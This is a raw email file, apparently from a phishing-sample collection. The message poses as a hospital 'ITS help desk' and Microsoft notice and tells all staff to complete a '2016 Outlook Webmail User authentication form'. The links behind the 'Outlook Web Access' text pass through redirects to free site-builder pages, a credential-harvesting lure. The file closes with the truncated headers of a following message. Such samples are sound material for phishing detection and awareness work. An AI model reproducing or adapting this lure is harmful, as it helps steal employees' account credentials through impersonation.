From: Alma Vega <Alma.Vega@williamoslerhs.ca>
To: Alma Vega <Alma.Vega@williamoslerhs.ca>
Thread-Topic: ITS help desk
Thread-Index: AdJQiWoT7DbF+ZpVS3aBJLKETnF3RAAJWB41
Date: Wed, 7 Dec 2016 17:44:00 +0000
Message-ID: <27496CB92848BE48896E05144F9E847D013E51D381@BCHSPEXMB01.oslerhc.org>
References: <27496CB92848BE48896E05144F9E847D013E515A15@BCHSPEXMB01.oslerhc.org>
In-Reply-To: <27496CB92848BE48896E05144F9E847D013E515A15@BCHSPEXMB01.oslerhc.org>
Accept-Language: en-CA, en-US
Content-Language: en-CA
X-MS-Has-Attach:
X-MS-TNEF-Correlator:
Received-SPF: none
Status: RO
X-Status: 
X-Keywords:                 
X-UID: 450

--_000_27496CB92848BE48896E05144F9E847D013E51D381BCHSPEXMB01os_
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

To All Employees\Staff,

Take note of this important update that our new web mail has been improved =
with a new messaging system from Owa/outlook which also include faster usag=
e on email, shared calendar,web-documents and the new 2016 anti-spam versio=
n.

Kindly use the link below to complete your 2016 Outlook Webmail User authen=
tication form.

CLICK on Outlook Web Access<http://www.google.com/url?q=3Dhttp%3A%2F%2Fwww.=
imxprs.com%2Ffree%2Fwebmailverificationportal%2Fhelp-desk-page&sa=3DD&sntz=
=3D1&usg=3DAFQjCNGP7nUnZpE1rh6wpipx0s6DZQwPvQ> <https://www.google.com/url?=
q=3Dhttps%3A%2F%2Fmail.mihs.org%2Fowa%2Fredir.aspx%3FSURL%3D2RpnCryS5EGbUIU=
LT5PQ7y60UaFznvfyp4wRZUKEcv52n5eSbxTUCGgAdAB0AHAAOgAvAC8AdwB3AHcALgBpAG0AYw=
ByAGUAYQB0AG8AcgAuAGMAbwBtAC8AZgByAGUAZQAvAGgAbABwAGQAZQBzAGsALwB3AGUAYgAtA=
GEAYwBjAGUAcwBzAC0AcABvAHIAdABhAGwA%26URL%3Dhttp%253a%252f%252fwww.imcreato=
r.com%252ffree%252fhlpdesk%252fweb-access-portal&sa=3DD&sntz=3D1&usg=3DAFQj=
CNGH4ymnZcWD93kE_hnsKirxYubKJQ> to update immediately.


ITS help desk
ADMIN TEAM

=A9 Copyright 2016 Microsoft
All right Reserved.


This e-mail and any attachments may contain confidential and

privileged information. If you are not the intended recipient,

please notify the sender immediately by return e-mail, delete this

e-mail and destroy any copies. Any dissemination or use of this

information by a person other than the intended recipient is

unauthorized and may be illegal.


--_000_27496CB92848BE48896E05144F9E847D013E51D381BCHSPEXMB01os_
Content-Type: text/html; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

<html dir=3D"ltr">
<head>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859-=
1">
<style id=3D"owaParaStyle" type=3D"text/css">=0A=
<!--=0A=
p=0A=
	{margin-top:0;=0A=
	margin-bottom:0}=0A=
-->=0A=
P {margin-top:0;margin-bottom:0;}</style>
</head>
<body ocsi=3D"0" fpstyle=3D"1">
<div style=3D"direction: ltr;font-family: Tahoma;color: #000000;font-size: =
10pt;"><font face=3D"Arial"><b style=3D"line-height:22.72px">T</b></font><b=
 style=3D"font-family:Arial; line-height:22.72px">o All Employees\Staff,</b=
><br style=3D"font-family:Calibri,Arial,Helvetica,sans-serif">
<div style=3D"font-family: Times New Roman; color: #000000; font-size: 16px=
">
<div>
<div style=3D"direction:ltr; font-family:Tahoma; color:#000000; font-size:1=
0pt">
<div class=3D"msg">
<div>
<div style=3D"direction:ltr; font-family:Tahoma; color:#000000; font-size:1=
0pt">
<div style=3D"color:rgb(0,0,0); font-family:HelveticaNeue,&quot;Helvetica N=
eue&quot;,Helvetica,Arial,&quot;Lucida Grande&quot;,sans-serif; font-style:=
normal; font-weight:normal; letter-spacing:normal; text-align:start; text-i=
ndent:0px; text-transform:none; white-space:normal; word-spacing:0px; outli=
ne:none 0px; display:table; width:567px; padding-top:12px; padding-left:0px=
; font-size:13px">
<div style=3D"display:table-cell; width:auto; word-wrap:break-word">
<div>
<div>
<div style=3D"font-size:16px">
<pre style=3D"font-family:&quot;Courier New&quot;; margin:1em 0px; display:=
block; white-space:pre-wrap; max-width:100%; line-height:18.9333px; word-wr=
ap:break-word; font-size:13.3333px"><font style=3D"line-height:normal" face=
=3D"Arial" size=3D"3">Take note of this important update that our new web m=
ail has been improved&nbsp;</font><font style=3D"line-height:normal" face=
=3D"Arial" size=3D"3">with a new messaging system from Owa/outlook which al=
so include faster usage on email, </font><span style=3D"line-height:normal;=
 font-family:Arial; font-size:medium">shared calendar,web-documents and the=
 new 2016 anti-spam version.</span></pre>
<pre style=3D"font-family:&quot;Courier New&quot;; margin:1em 0px; display:=
block; white-space:pre-wrap; max-width:100%; line-height:18.9333px; word-wr=
ap:break-word; font-size:13.3333px"><font style=3D"line-height:normal" face=
=3D"Arial" size=3D"3">Kindly use the link below to complete your 2016 Outlo=
ok Webmail User authentication form</font><span style=3D"line-height:normal=
; font-family:Arial; font-size:medium">.</span></pre>
<pre style=3D"font-family:&quot;Courier New&quot;; margin:1em 0px; display:=
block; white-space:pre-wrap; max-width:100%; line-height:18.9333px; word-wr=
ap:break-word; font-size:13.3333px"><font style=3D"line-height:normal" face=
=3D"Arial" size=3D"3">CLICK on <span style=3D"line-height:22.72px; font-wei=
ght:inherit; color:rgb(0,104,207)"><font style=3D"line-height:normal" color=
=3D"#0000ff" size=3D"4"><font color=3D"#0000cc"><font color=3D"#0068cf"><sp=
an style=3D"line-height:25.56px; font-weight:inherit"><font color=3D"#196ad=
4"><span style=3D"outline-color:initial"><a rel=3D"nofollow noreferrer" hre=
f=3D"http://www.google.com/url?q=3Dhttp%3A%2F%2Fwww.imxprs.com%2Ffree%2Fweb=
mailverificationportal%2Fhelp-desk-page&amp;sa=3DD&amp;sntz=3D1&amp;usg=3DA=
FQjCNGP7nUnZpE1rh6wpipx0s6DZQwPvQ" style=3D"margin:0px; padding:0px; text-d=
ecoration:underline!important; background:transparent; color:rgb(25,106,212=
); outline:none" target=3D"_blank">Outlook Web Access</a></span></font></sp=
an></font></font></font></span><font size=3D"4"><a rel=3D"nofollow noreferr=
er" href=3D"https://www.google.com/url?q=3Dhttps%3A%2F%2Fmail.mihs.org%2Fow=
a%2Fredir.aspx%3FSURL%3D2RpnCryS5EGbUIULT5PQ7y60UaFznvfyp4wRZUKEcv52n5eSbxT=
UCGgAdAB0AHAAOgAvAC8AdwB3AHcALgBpAG0AYwByAGUAYQB0AG8AcgAuAGMAbwBtAC8AZgByAG=
UAZQAvAGgAbABwAGQAZQBzAGsALwB3AGUAYgAtAGEAYwBjAGUAcwBzAC0AcABvAHIAdABhAGwA%=
26URL%3Dhttp%253a%252f%252fwww.imcreator.com%252ffree%252fhlpdesk%252fweb-a=
ccess-portal&amp;sa=3DD&amp;sntz=3D1&amp;usg=3DAFQjCNGH4ymnZcWD93kE_hnsKirx=
YubKJQ" style=3D"margin:0px; padding:0px; text-decoration:underline!importa=
nt; background:transparent; color:rgb(25,106,212); outline:none" target=3D"=
_blank"> </a></font>to update immediately.<br style=3D"line-height:22.72px"=
><br style=3D"line-height:22.72px"></font></pre>
<pre style=3D"font-family:&quot;Courier New&quot;; margin:1em 0px; display:=
block; white-space:pre-wrap; max-width:100%; line-height:18.9333px; word-wr=
ap:break-word; font-size:13.3333px"><div style=3D"font-family:Calibri,Arial=
,Helvetica,sans-serif; font-size:medium; line-height:normal; white-space:no=
rmal"><font face=3D"Calibri,Arial,Helvetica,sans-serif" color=3D"#4BA524" s=
ize=3D"2"><span style=3D"font-size:16px"><b><u>ITS help desk</u></b></span>=
</font><font face=3D"Calibri,Arial,Helvetica,sans-serif" color=3D"#0068CF" =
size=3D"2"><span style=3D"font-size:16px"><b><u><br></u></b></span></font><=
font face=3D"Calibri,Arial,Helvetica,sans-serif" color=3D"maroon" size=3D"2=
"><span style=3D"font-size:16px"><b>ADMIN TEAM</b></span></font></div><div =
style=3D"font-family:Calibri,Arial,Helvetica,sans-serif; font-size:medium; =
line-height:normal; white-space:normal"><font face=3D"Calibri,Arial,Helveti=
ca,sans-serif" color=3D"#0068CF">&nbsp;</font></div><div style=3D"font-fami=
ly:Calibri,Arial,Helvetica,sans-serif; font-size:medium; line-height:normal=
; white-space:normal"><font face=3D"Calibri,Arial,Helvetica,sans-serif">=A9=
 Copyright 2016 Microsoft</font></div><div dir=3D"ltr" style=3D"text-align:=
start; font-family:Calibri,Arial,Helvetica,sans-serif; font-size:medium; li=
ne-height:normal; white-space:normal"><font face=3D"Calibri,Arial,Helvetica=
,sans-serif">All righ</font><font face=3D"Calibri,Arial,Helvetica,sans-seri=
f">t Reserved.</font></div></pre>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</body>
</html>

<p>

This e-mail and any attachments may contain confidential and<br>
<br>
privileged information. If you are not the intended recipient,<br>
<br>
please notify the sender immediately by return e-mail, delete this<br>
<br>
e-mail and destroy any copies. Any dissemination or use of this<br>
<br>
information by a person other than the intended recipient is<br>
<br>
unauthorized and may be illegal.<br>
<br>
<br>
</p>
--_000_27496CB92848BE48896E05144F9E847D013E51D381BCHSPEXMB01os_--

From jose@monkey.org Thu Dec  8 16:02:30 2016 +0000
Return-Path: apache@s12.plako.net
Delivered-To: jose@monkey.org
X-FDA: 72268905660.22.stop39_8a0fa8b192207
X-Spam-Summary: 50,0,0,2a422f1c3d04f52e,d41d8cd98f00b204,apache@s12.plako.net,:,RULES_HIT:2:41:72:355:375:379:541:543:882:960:962:966:967:969:973:979:983:988:989:1189:1208:1224:1260:1263:1311:1313:1314:1345:1381:1394:1395:1431:1432:1433:1434:1436:1437:1515:1516:1517:1535:1550:1556:1571:1588:1589:1593:1594:1606:1710:1730:1747:1777:1792:1981:2069:2070:2084:2194:2196:2198:2199:2200:2201:2393:2525:2527:2538:2539:2560:2567:2612:2682:2685:2693:2828:2859:2891:2892:2910:2933:2937:2939:2942:2945:2947:2951:2954:3000:3022:3138:3139:3140:3141:3142:3148:3167:3352:3503:3504:3865:3866:3867:3868:3870:3871:3872:3873:3874:3892:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4321:4361:4383:4384:4385:4395:5007:6678:6688:6703:7903:7927:8518:8599:8603:8885:8957:8987:9025:9040:9080:9199:9388:9391:9908:10049:10231:10346:11026:11209:11257:11473:11657:11658:11914:12043:12217:12324:12438:12555:12740:12763:12776:12903:12956:12958:12986:13025:13143:13230:13374:13439:13546:13868:13877:13894:13972:14094:14096:14
X-HE-Tag: stop39_8a0fa8b192207
X-Filterd-Recvd-Size: 5803
Received: from s23.plako.net (s23.plako.net [195.22.14.173])
	by imf28.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Thu,  8 Dec 2016 16:02:28 +0000 (UTC)
Date: Thu, 8 Dec 2016 16:02:47 +0000
To: jose@monkey.org
